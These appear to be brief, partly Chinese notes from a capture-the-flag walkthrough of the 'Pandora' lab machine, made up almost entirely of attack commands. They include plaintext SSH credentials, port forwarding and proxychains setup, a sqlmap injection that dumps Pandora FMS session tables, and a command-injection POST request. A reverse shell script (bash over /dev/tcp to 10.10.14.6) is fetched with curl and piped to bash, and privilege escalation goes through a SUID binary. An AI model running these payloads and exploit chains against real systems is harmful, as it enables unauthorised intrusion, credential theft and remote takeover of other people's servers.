Pandora
10.129.134.46
ssh daniel@10.129.134.46
HotelBabylon23
g4e01qdgk36mfdh90hvcc54umq
配置端口转发
ssh -fgN -L 8989:localhost:80 daniel@10.129.134.46
配置proxychains
sudo vim /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 9098 daniel HotelBabylon23
sqlmap
sqlmap --url="http://10.129.134.46:8989/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump --batch
POST /pandora_console/ajax.php HTTP/1.1
page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1
反弹shell
$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/1337 0>&1
$ ls
shell.sh
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$ nc -nvlp 9999
payload
$ curl+10.10.14.6:80/shell.sh|bash
权限提升
查找所有带有SUID权限的文件
$ find / -perm -4000 2>/dev/null
$ ls -al /usr/bin/pandora_backup
$ /usr/bin/pandora_backup
$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
$ python -c "import pty;pty.spawn('/bin/bash')"